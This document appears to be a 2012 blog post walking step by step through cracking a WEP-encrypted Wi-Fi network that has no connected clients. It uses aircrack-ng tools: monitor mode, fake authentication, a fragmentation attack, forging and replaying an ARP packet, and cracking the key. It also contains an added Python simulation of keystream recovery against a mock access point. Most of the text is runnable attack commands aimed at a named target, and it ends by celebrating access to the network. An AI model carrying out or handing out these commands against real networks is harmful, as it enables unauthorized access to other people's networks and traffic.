Friday, March 23, 2012

Cracking WEP with No Client

Overview of steps taken:

1. Start card in monitor mode with airmon-ng
2. Search for available networks using airodump-ng
3. Find victim network and gather info.
4. Disable monitor mode and re-enable it on the victim's channel
5. Start airodump-ng, filtered to the victim and writing to a capture file
6. Fake auth with the AP
7. Obtain a PRGA key stream using chopchop or fragmentation
8. Create an ARP packet for injection using packetforge-ng
9. Inject the packet you created into the network using ARP replay
10. With enough IVs, crack the WEP key using aircrack-ng

First we run airmon-ng to see our current wireless interfaces.

airmon-ng

If you have any VAPs (the virtual monitor-mode interfaces airmon-ng creates) running, kill them with the airmon-ng stop command first. Now start up a new VAP in monitor mode.

airmon-ng start wlan0

With monitor mode enabled on mon0, we can use that interface to look for our target network.
airodump-ng mon0

Take note of the following:

· Target network ESSID
· BSSID
· Channel #
· That it is using WEP encryption (the ENC column shows WEP)
· Your wireless card's MAC address (obtained from ifconfig)

Now that we have gathered our information we can kill our current VAP and start it on the target's channel (channel 1 in this example).
airmon-ng stop mon0
airmon-ng start wlan0 1

Let's start airodump again, but filter it to our target network (its channel and BSSID) and specify the output file prefix. Note the double dash on --bssid.

airodump-ng -c 1 --bssid 58:6D:8F:74:40:9B -w noclient mon0

Let this session of airodump run in the background so we can capture the IVs generated; the -w file is what aircrack-ng will read later.

Before injecting anything we must run a fake authentication so the AP associates our MAC address; an AP rejects (deauthenticates) data frames that arrive from a station it has not associated, so later injection would fail without this step.

aireplay-ng -1 60 -e Buddy -a 58:6D:8F:74:40:9B -h 00:C0:CA:32:3D:85 mon0

Here -1 60 re-authenticates every 60 seconds, -e is the target ESSID (Buddy), -a its BSSID and -h our card's MAC. Wait for "Association successful :-)" before continuing; if the AP enforces MAC filtering, the association will fail and the remaining steps cannot proceed from this MAC. Let the fake auth attack run in the background and open a new terminal.

Now we can begin our chopchop or fragmentation attack to obtain the PRGA key stream: a stretch of the RC4 key stream for one IV, long enough to encrypt a packet of our own without knowing the WEP key. In this example I will be using the fragmentation attack (the chopchop attack is -4 with the same arguments). In the new terminal type:

aireplay-ng -5 -b 58:6D:8F:74:40:9B -h 00:C0:CA:32:3D:85 mon0

Once a packet is found hit "y" to continue the attack.

You now have a saved key stream (aireplay-ng writes it to a fragment-*.xor file in the current directory) that can be used with packetforge.



Using packetforge-ng and our saved key stream, we will create an ARP request for injection.

packetforge-ng -0 -a 58:6D:8F:74:40:9B -h 00:C0:CA:32:3D:85 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0114-044641.xor -w arp_packet

Here -0 selects an ARP packet, -a and -h are the BSSID and our MAC, -k and -l are the destination and source IP (the broadcast address, so the AP will relay it), -y is the saved PRGA file and -w the output file. Use the name of your own .xor file; the timestamp in the name will differ.

We can now use the interactive packet replay attack to inject the ARP packet we just created.

aireplay-ng -2 -r arp_packet mon0

Hit "y" and your packet will be injected. Check airodump to see whether IVs are being captured: the #Data count for the target BSSID should climb quickly, because the AP re-encrypts every relayed broadcast under a fresh IV.
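What steps 7 through 9 rely on, as an added simulation that is not part of the original post and not aircrack-ng's code: WEP encrypts a frame by XORing plaintext||ICV with RC4(IV||key), so anyone who knows the key stream for one IV can forge a valid frame under that IV (packetforge-ng's job), and the first 8 bytes of that key stream fall out of the known LLC/SNAP header of any captured data frame. The fragmentation attack grows those 8 bytes by sending up to 16 short fragments under the known IV and reading back the AP's re-encrypted, reassembled copy. Everything here is constructed: the 40-bit key, the IV sequence, the captured ARP frame and the FakeAP class that stands in for the real access point; 802.11 headers, fragment flags and timing are left out.

```python
import struct
import zlib
from typing import List, Optional, Tuple


def rc4(key: bytes, n: int) -> bytes:
    """RC4 keystream (KSA then PRGA). WEP seeds RC4 with IV || secret key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


# LLC/SNAP header that opens every WEP-protected data payload (0x0806 = ARP).
# These 8 bytes of known plaintext are all the fragmentation attack starts with.
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")


class FakeAP:
    """Stand-in for the access point: holds the key and relays broadcast frames."""

    def __init__(self, wep_key: bytes):
        self.key = wep_key
        self.next_iv = 0x10000  # constructed IV sequence; real APs vary

    def encrypt(self, plaintext: bytes) -> bytes:
        """Frame body = IV(3) || key-id(1) || RC4_{IV||key}(plaintext || ICV)."""
        iv = self.next_iv.to_bytes(3, "big")
        self.next_iv += 1
        body = plaintext + icv(plaintext)
        return iv + b"\x00" + xor(body, rc4(iv + self.key, len(body)))

    def decrypt(self, frame: bytes) -> Optional[bytes]:
        iv, body = frame[:3], frame[4:]
        pt = xor(body, rc4(iv + self.key, len(body)))
        return pt[:-4] if icv(pt[:-4]) == pt[-4:] else None

    def relay_fragments(self, fragments: List[bytes]) -> Optional[bytes]:
        """Decrypt each fragment, reassemble, re-encrypt under a fresh IV and send
        it on, as the AP does with a fragmented frame to the broadcast MAC."""
        parts = [self.decrypt(f) for f in fragments]
        if any(p is None for p in parts):
            return None  # bad ICV: the AP silently drops the frame
        return self.encrypt(b"".join(parts))


# --- attacker side: no key, only captured frames and the AP as an oracle ---

def recover_keystream(frame: bytes, known_plaintext: bytes) -> Tuple[bytes, bytes]:
    """ciphertext XOR known plaintext = keystream bytes for that frame's IV."""
    return frame[:3], xor(frame[4:4 + len(known_plaintext)], known_plaintext)


def forge(iv: bytes, keystream: bytes, plaintext: bytes) -> bytes:
    """packetforge-ng's job: a frame the AP accepts, built from a keystream alone."""
    body = plaintext + icv(plaintext)
    if len(body) > len(keystream):
        raise ValueError("keystream too short for this payload")
    return iv + b"\x00" + xor(body, keystream[:len(body)])


def fragmentation_attack(ap: FakeAP, captured: bytes, want: int) -> Tuple[bytes, bytes]:
    """Grow 8 known keystream bytes to >= `want` bytes (what aireplay-ng -5 does).
    Each round sends up to 16 fragments of len(ks)-4 chosen plaintext bytes, all
    under the same known IV; the AP relays the reassembled frame under a new IV
    whose plaintext we chose, so we learn a much longer keystream for that IV."""
    iv, ks = recover_keystream(captured, LLC_SNAP_ARP)
    while len(ks) < want:
        chunk = len(ks) - 4                       # 4 bytes of each fragment go to the ICV
        nfrag = min(16, (want + chunk - 1) // chunk)
        plain = LLC_SNAP_ARP + bytes(nfrag * chunk - 8)  # first fragment carries LLC/SNAP
        frags = [forge(iv, ks, plain[k:k + chunk]) for k in range(0, len(plain), chunk)]
        relayed = ap.relay_fragments(frags)
        if relayed is None:
            raise RuntimeError("AP dropped the fragments")
        iv, ks = recover_keystream(relayed, plain + icv(plain))
    return iv, ks


def run_demo() -> Tuple[int, bool, bool]:
    ap = FakeAP(bytes.fromhex("0123456789"))      # constructed 40-bit WEP key
    # One broadcast ARP request the AP sent, as airodump-ng would capture it (constructed).
    captured = ap.encrypt(LLC_SNAP_ARP + bytes.fromhex("0001080006040001") + bytes(20))
    iv, ks = fragmentation_attack(ap, captured, 1500)
    # The ARP request packetforge-ng builds: our MAC, source and target IP 255.255.255.255.
    arp = (LLC_SNAP_ARP + bytes.fromhex("0001080006040001")
           + bytes.fromhex("00c0ca323d85") + b"\xff" * 4 + bytes(6) + b"\xff" * 4)
    forged = forge(iv, ks, arp)
    # Lab-only checks: the recovered keystream is the real one, and the AP accepts the forgery.
    return len(ks), ks == rc4(iv + ap.key, len(ks)), ap.decrypt(forged) == arp
```

Three rounds of relaying (16, 16 and then 2 fragments) take the attacker from 8 to 2052 keystream bytes, comfortably above the ~1500 that aireplay-ng aims for, and the forged ARP request decrypts cleanly at the AP even though the attacker never touched the key. This is also why each replayed ARP yields a new IV for aircrack-ng: the AP must re-encrypt the relayed copy under an IV of its own.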



Once you have a fair amount of IVs, you can attempt to crack the key. Open a new terminal and type:

aircrack-ng -0 noclient*.cap

Success! You can now use the recovered WEP key to get on the wireless network. If unsuccessful, leave airodump and the replay running and re-attempt cracking every 5,000 additional IVs captured; aircrack-ng run against the live capture file retries on its own as new IVs arrive.